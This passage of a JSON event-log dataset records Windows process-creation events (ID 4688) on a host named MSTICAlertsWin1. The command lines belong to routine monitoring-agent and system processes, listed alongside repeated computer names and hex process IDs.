State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"taskhostw.exe SYSTEM\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"cmd\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\Registry.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\222\\\\pmfexe.exe\\\" -PerfMode optimize -quickscan -event -json -alldetectors\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\"],\"Computer\":[\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\"],\"EventID\":[4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688],\"NewProcessId\":[\"0x1610\",\"0x1790\",\"0xcd8\",\"0x28c\",\"0x1284\",\"0xb10\",\"0x2a8\",\"0x90c\",\"0x130c\",\"0xc84\",\"0x570\",\"0x28c\",\"0xb8\",\"0xd14\",\"0x1490\",\"0x148c\",\"0x1414\",\"0x1530\",\"0x7b4\",\"0x1594\",\"0x1630\",\"0x16a0\",\"0x1694\",\"0x1658\",\"0x1740\",\"0xd14\",\"0x1094\",\"0x1270\",\"0xc10\",\"0x6ec\",\"0x1388\",\"0xc08\",\"0x364\",\"0x1338\",\"0x12fc\",\"0x1128\",\"0x13fc\",\"0x123c\",\"0x13e8\",\"0x6bc\",\"0x1254\",\"0x11b0\",\"0x1d0\",\"0x1070\",\"0x6ec\",\"0xc84\",\"0x16fc\",\"0x1700\",\"0x1728\",\"0x1738\",\"0x175c\",\"0x176c\",\"0x17a8\",\"0x17a0\",\"0x17cc\",\"0x17e8\",\"0x143c\",\"0x1064\",\"0x1434\",\"0xbb4\",\"0x1404\",\"0x148c\",\"0x1464\",\"0x14b8\",\"0x14ec\",\"0x14f0\",\"0x14e8\",\"0x1564\",\"0x155c\",\"0x1550\",\"0x690\",\"0x123c\",\"0x244\",\"0xa10\",\"0xc54\",\"0xbc8\",\"0x10cc\",\"0x1288\",\"0x3dc\",\"0x2a8\",\"0xa5c\",\"0xfc0\",\"0x10b8\",\"0x132c\",\"0x4e8\",\"0xcd8\",\"0x97c\",\"0x90c\",\"0xe68\",\"0x12fc\",\"0xc18\",\"0xbb4\",\"0x1274\",\"0x614\",\"0xd10\",\"0xbdc\",\"0x135c\",\"0x103c\",\"0x1014\",\"0xbb4\",\"0x11cc\",\"0x123c\",\"0x132c\",\"0x156c\",\"0x1580\",\"0x15a0\",\"0x15b4\",\"0x15d4\",\"0x15e8\",\"0x1608\",\"0x161c\",\"0x163c\",\"0x1650\",\"0x1670\",\"0x1684\",\"0x16a4\",\"0x16b8\",\"0x16d8\",\"0x16ec\",\"0x170c\",\"0xa08\",\"0x4e8\",\"0x240\",\"0x1250\",\"0x140c\",\"0x142c\",\"0x1448\",\"0x1450\",\"0x1458\",\"0x1498\",\"0x14ac\",\"0x14cc\",\"0x14e0\",\"0xbdc\",\"0x13a8\",\"0xa4\",\"0x